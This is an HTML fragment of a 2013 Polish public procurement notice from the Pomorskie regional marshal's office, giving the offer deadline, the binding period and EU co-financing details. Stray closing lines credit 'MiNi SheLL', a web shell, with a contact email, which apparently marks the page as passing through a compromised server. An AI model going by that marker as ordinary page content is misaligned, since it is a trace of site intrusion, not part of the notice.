<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorskie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Departament Zamówień Publicznych i Administracji w Urzędzie Marszałkowskim Wojeówdztwa Pomorskiego w Gdańsku, ul. Okopowa 21/27 80-810 Gdańsk, pokój 133 G.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2013 godzina 09:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego w Gdańsku ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr 4A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki oraz Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013 oraz z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013 oraz w ramach Europejskiego Funduszu Rybackiego oraz Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com